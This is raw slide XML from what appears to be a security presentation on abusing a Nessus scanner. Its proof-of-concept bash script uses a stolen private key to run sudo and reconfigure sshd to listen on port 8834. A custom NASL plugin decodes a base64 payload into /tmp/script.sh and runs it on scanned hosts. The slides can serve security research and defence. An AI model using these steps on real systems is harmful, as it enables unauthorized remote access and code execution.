          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5615109" y="1617757"/>
            <a:ext cx="407491" cy="1608299"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16810126"/>
              <a:gd name="adj2" fmla="val 4707170"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="381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TextBox 74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6505204" y="2322415"/>
            <a:ext cx="449335" cy="237893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EDF1F3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0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Audit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="nb-NO" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1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41766" y="2332926"/>
            <a:ext cx="381489" cy="237893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EDF1F3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0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SSH</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="nb-NO" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1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Flowchart: Connector 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744367" y="2519539"/>
            <a:ext cx="274320" cy="274320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Flowchart: Connector 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5901439" y="1048554"/>
            <a:ext cx="274320" cy="274320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Flowchart: Connector 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6038599" y="3357849"/>
            <a:ext cx="274320" cy="274320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TextBox 87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133024" y="2499087"/>
            <a:ext cx="1176846" cy="23789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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0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SSH: TCP 8834 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="nb-NO" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1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35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97531E-6 C 0.05052 1.97531E-6 0.10278 -0.00494 0.15226 -0.01976 C 0.20069 -0.03241 0.26094 -0.05617 0.29097 -0.08766 C 0.32153 -0.11821 0.30642 -0.17871 0.33385 -0.20371 C 0.35417 -0.23148 0.4434 -0.27531 0.4533 -0.2848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C 0.00486 0.01173 0.02934 0.04784 0.03975 0.06945 C 0.05017 0.09074 0.05538 0.10185 0.06128 0.12778 C 0.07274 0.16729 0.06996 0.19198 0.07083 0.22994 C 0.07187 0.2679 0.07552 0.31482 0.06666 0.35124 C 0.05989 0.38087 0.06111 0.37963 0.05225 0.3963 C 0.0434 0.41327 0.01805 0.44229 0.01528 0.45031 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="4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54 C -0.01336 -0.03642 -0.03732 -0.04476 -0.05052 -0.0821 C -0.06007 -0.10618 -0.06302 -0.18797 -0.06041 -0.225 C -0.05798 -0.26173 -0.06215 -0.29661 -0.0526 -0.3213 C -0.04895 -0.34568 -0.04496 -0.36451 -0.03871 -0.3858 C -0.03246 -0.4071 -0.01927 -0.43642 -0.01545 -0.44908 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="5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22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3" grpId="0" animBg="1"/>
      <p:bldP spid="74" grpId="0" animBg="1"/>
      <p:bldP spid="75" grpId="0" animBg="1"/>
      <p:bldP spid="76" grpId="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" animBg="1"/>
      <p:bldP spid="82" grpId="1" animBg="1"/>
      <p:bldP spid="82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68" y="378366"/>
            <a:ext cx="5084218" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on Port 8834: Payload (POC)</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/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540000" y="1081326"/>
            <a:ext cx="8076176" cy="34624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376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#/bin/bash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376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NESSUS_SERVER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“X.X.X.X"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376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NESSUS_USER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“username"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376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NESSUS_PRIVATE_KEY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="-----BEGIN EC PRIVATE KEY----- …”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376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "${NESSUS_PRIVATE_KEY}" &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp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private_key</a:t>
            </a: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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 400 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp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private_key</a:t>
            </a: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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>oStrictHostKeyChecking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=no -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp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private_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" "${NESSUS_USER}"@"${NESSUS_SERVER}" "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 's/^\#Port\ 22/Port\ 22/' /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc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ssh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sshd_config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“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376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> echo 'Port 8834' | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tee --append /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc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ssh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sshd_config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt; /dev/null"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376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc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init.d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nessusd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> stop &gt; /dev/null"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376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> kill -HUP \$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> | grep /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr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sbin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sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> | grep -v 'grep' | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>awk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> '{print \$2}')"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194974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273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26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15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64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8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to Restricted Zone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1344168" y="378366"/>
            <a:ext cx="7114032" cy="411898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655" y="3486361"/>
            <a:ext cx="383231" cy="37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698" y="1869005"/>
            <a:ext cx="619808" cy="394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805" y="2822984"/>
            <a:ext cx="613463" cy="390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136" y="3190850"/>
            <a:ext cx="438264" cy="327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600" y="3532723"/>
            <a:ext cx="678239" cy="32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412" y="3862874"/>
            <a:ext cx="613463" cy="390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188" y="2426753"/>
            <a:ext cx="595789" cy="2845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502" y="3981782"/>
            <a:ext cx="442107" cy="3300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572" y="3973574"/>
            <a:ext cx="613463" cy="3908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6062" y="2866579"/>
            <a:ext cx="442107" cy="3300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9083" y="2879375"/>
            <a:ext cx="488862" cy="3114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34736" y="3667989"/>
            <a:ext cx="602299" cy="3393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43713" y="3667989"/>
            <a:ext cx="602299" cy="3393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34736" y="3667989"/>
            <a:ext cx="602299" cy="3393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43712" y="3667989"/>
            <a:ext cx="602299" cy="3393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50333" y="3663827"/>
            <a:ext cx="602299" cy="3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33333" decel="33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24 C 0.00729 -0.00062 -0.02882 -0.04661 -0.0309 -0.08241 C -0.03316 -0.11852 -0.04132 -0.22562 -0.01337 -0.21667 C -0.00677 -0.22408 0.03368 -0.21667 0.03663 -0.20494 C 0.04896 -0.15494 0.03455 -0.10031 0.04271 -0.06945 C 0.03941 -0.0179 0.07309 -0.03488 0.0842 -0.02068 C 0.09531 -0.00618 0.1007 0.05216 0.10903 0.06111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-78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33333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34568E-6 C 0.0073 2.34568E-6 -0.02882 -0.04599 -0.0309 -0.08179 C -0.03316 -0.1179 -0.04132 -0.225 -0.01336 -0.21605 C 0.00695 -0.2358 0.0665 -0.21327 0.09063 -0.20062 C 0.10174 -0.18611 0.11754 -0.14753 0.12674 -0.13858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112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33333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34568E-6 C 0.00712 2.34568E-6 -0.02882 -0.0463 -0.0309 -0.0821 C -0.02969 -0.10864 -0.03698 -0.17963 -0.02517 -0.20432 C -0.01337 -0.22901 0.03386 -0.19383 0.03993 -0.22994 C 0.05209 -0.27871 0.03525 -0.34815 0.04254 -0.375 C 0.04965 -0.40185 0.07153 -0.39198 0.08264 -0.39136 C 0.09323 -0.38889 0.10261 -0.38148 0.11059 -0.37068 C 0.11858 -0.35988 0.12674 -0.33241 0.13108 -0.32685 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="1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96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33333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34568E-6 C 0.00799 2.34568E-6 -0.02795 -0.04753 -0.03003 -0.08334 C -0.02882 -0.11019 -0.05277 -0.21513 -0.0092 -0.21605 L 0.20296 -0.20895 C 0.24358 -0.21698 0.2566 -0.21759 0.27032 -0.20432 C 0.28386 -0.19136 0.27969 -0.13611 0.28507 -0.13087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533912" y="868704"/>
            <a:ext cx="8076176" cy="36933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if (description)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{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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(100000); # ID must be unique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  …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}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include("global_settings.inc");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include("ssh_func.inc");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include("telnet_func.inc");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include("hostlevel_funcs.inc");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if ( ! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defined_func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>") ) exit(1, "'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()' is not defined.");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>info_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = INFO_LOCAL;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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = "echo                | base64 -d &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/script.sh; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> +x /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/script.sh; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/script.sh";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>info_send_cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd:cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);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" y="466344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Source plugin: /opt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>/plugins/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
              <a:t>linux_user_enum.nasl</a:t>
            </a:r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1475944" y="4017789"/>
            <a:ext cx="878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376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'payload'</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1400" dirty="0"/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540067" y="378366"/>
            <a:ext cx="5091475" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on Port 8834: Custom Plugin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121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28B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28B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67" y="378366"/>
            <a:ext cx="6762941" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on Port 8834: Create Custom Feed</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/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640080" y="466344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Source plugin: https://community.tenable.com/thread/9384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00" y="880158"/>
            <a:ext cx="8076176" cy="36471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1. Create a custom feed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200"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cat &lt;&lt;EOF &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200"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PLUGIN_SET = "$(date +"%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y%m%d%H%M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>")";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200"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PLUGIN_FEED = "Custom";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200"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EOF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200"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mv ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enable_sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enable_sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_$(date +"%</a:t>
            </a:r>
            <a:r>
